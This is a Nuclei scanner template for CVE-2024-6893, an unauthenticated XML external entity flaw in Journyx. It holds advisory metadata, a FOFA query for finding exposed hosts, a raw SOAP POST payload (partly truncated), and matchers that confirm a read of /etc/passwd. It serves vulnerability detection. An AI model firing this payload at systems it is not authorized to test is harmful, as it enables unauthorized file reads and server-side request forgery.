id: CVE-2024-6893 info: name: Journyx - XML External Entities Injection (XXE) author: s4e-io severity: high description: | The "soap_cgi.pyc" API handler allows the XML body of SOAP requests to contain references to external entities. This allows an unauthenticated attacker to read local files, perform server-side request forgery, and overwhelm the web server resources. impact: | Unauthenticated attackers can exploit XXE to read local files, perform SSRF attacks, and cause denial of service by overwhelming server resources. remediation: | Update Journyx to version 11.5.5 or later to address the XXE vulnerability. reference: - https://securityforeveryone.com/tools/journyx-xxe-cve-2024-6893 - https://korelogic.com/Resources/Advisories/KL-001-2024-010.txt - https://packetstormsecurity.com/files/180005/Journyx-11.5.4-XML-Injection.html - https://nvd.nist.gov/vuln/detail/CVE-2024-6893 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2024-6893 cwe-id: CWE-611 epss-score: 0.91385 epss-percentile: 0.99679 metadata: max-request: 1 vendor: journyx product: journyx-jtime fofa-query: icon_hash="-109972155" tags: cve,cve2024,journyx,xxe,vkev,vuln variables: pass: "{{rand_text_alpha(5)}}" http: - raw: - | POST /jtcgi/soap_cgi.pyc HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded ]>&test;{{pass}}{{pass}} matchers-condition: and matchers: - type: regex part: body regex: - "root:.*:0:0:" - "invalid password for user" condition: and - type: word part: header words: - "text/xml" - type: status status: - 200 # digest: 4a0a00473045022100e6692b15c6b1d17af7ba75136a1548c5249f46fc3686218af594345122781f9a02204ba267b3c8bd1bef569ecee0d989266b0103aea5bbd36b34c9696f83d2803fc6:922c64590222798bb761d5b6d8e72950